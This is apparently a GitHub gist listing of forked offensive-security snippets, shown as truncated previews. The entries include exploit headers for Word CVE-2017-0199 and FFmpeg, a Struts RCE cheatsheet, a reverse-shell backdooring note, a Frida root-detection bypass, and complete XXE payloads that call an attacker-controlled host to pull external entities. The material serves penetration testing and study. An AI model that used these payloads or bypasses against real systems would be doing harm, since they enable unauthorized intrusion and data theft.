@AmesianX
AmesianX / smtpAudit.py
Created March 23, 2021 22:08 — forked from mgeeky/smtpAudit.py
SMTP Black-Box configuration audit / penetration testing tool - able to parse SPF/DKIM/Banner, test for Open-Relaying, test SSL/TLS enforcement and verify other common misconfigurations.
#!/usr/bin/python3
#
# SMTP Server configuration black-box testing/audit tool, capable of auditing
# SPF/Accepted Domains, DKIM, DMARC, SSL/TLS, SMTP services, banner, Authentication (AUTH, X-EXPS)
# user enumerations (VRFY, EXPN, RCPT TO), and others.
#
# Currently supported tests:
# 01) 'spf' - SPF DNS record test
# - 'spf-version' - Checks whether SPF record version is valid
# - 'all-mechanism-usage' - Checks whether 'all' mechanism is used correctly
@AmesianX
AmesianX / word2017-0199.py
Created March 23, 2021 22:10 — forked from mgeeky/word2017-0199.py
Microsoft Word (CVE-2017-0199) RCE through an HTA Handler, by Juan Sacco / <[email protected]>
# Exploit Author: Juan Sacco at KPN Red Team
# Developed using Exploit Pack - http://www.exploitpack.com <[email protected]>
#
# Description: Microsoft Word (CVE-2017-0199) is prone to an RCE through an HTA Handler
# A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files.
# An attacker who successfully exploited this vulnerability could take control of an affected system.
#
# Impact: An attacker could exploit this vulnerability to execute arbitrary commands in the
# context of the application. Failed exploit attempts could result in a
# denial-of-service condition.
@AmesianX
AmesianX / ffmpeg-0.4.9-exploit.py
Created March 23, 2021 22:10 — forked from mgeeky/ffmpeg-0.4.9-exploit.py
CVE-2009-0385 FFmpeg 0.4.9-pre1 Type Conversion into Write-What-Where exploit (non RELRO)
#!/usr/bin/python
#
# Vulnerable software:
# FFmpeg 0.4.9-pre1 (before 0.5), or the one accessible at:
# SVN-16556
# svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk@16556 ffmpeg
#
# Vulnerability has been discovered and documented by:
# Tobias Klein / http://www.trapkit.de
# http://www.trapkit.de/advisories/TKADV2009-004.txt
@AmesianX
AmesianX / XXE_payloads
Created March 23, 2021 22:11 — forked from mgeeky/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@AmesianX
AmesianX / blind-xxe-payload-1.txt
Created March 23, 2021 22:11 — forked from mgeeky/blind-xxe-payload-1.txt
Simplest Blind XXE Payload to test within HTML request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
@AmesianX
AmesianX / msfvenom-reverse-tcp-WaitForSingleObject.md
Created March 23, 2021 22:12 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment and WaitForSingleObject locating & patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.

Contents:

@AmesianX
AmesianX / struts-cheatsheet.md
Created March 23, 2021 22:30 — forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet

Apache Struts Remote Code Execution cheatsheet

Apache Struts is an open source framework for JavaEE web applications which encourages the use of the MVC (Model View Controller) architecture. When the application is developed in so-called devMode, as set in the struts.xml file:

<constant name="struts.devMode" value="true" />

Then the middleware will be handling additional parameters passed to every function invocation.

Testing for Struts devMode enabled

@AmesianX
AmesianX / root_bypass.js
Created April 6, 2021 01:15 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@AmesianX
AmesianX / apollo.txt
Created April 24, 2021 08:19 — forked from littlelailo/apollo.txt
Apple Bootrom Bug
This bug was also called moonshine in the beginning
Basically the following bug is present in all bootroms I have looked at:
1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
4. it then returns wLength which is the length it wants to receive into the buffer
5. the usb main code then updates a global var with the length and gets ready to receive the data packages
6. if a data package is received it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were received already
7. if all the data was received th
@AmesianX
AmesianX / web-servers.md
Created May 23, 2021 14:15 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000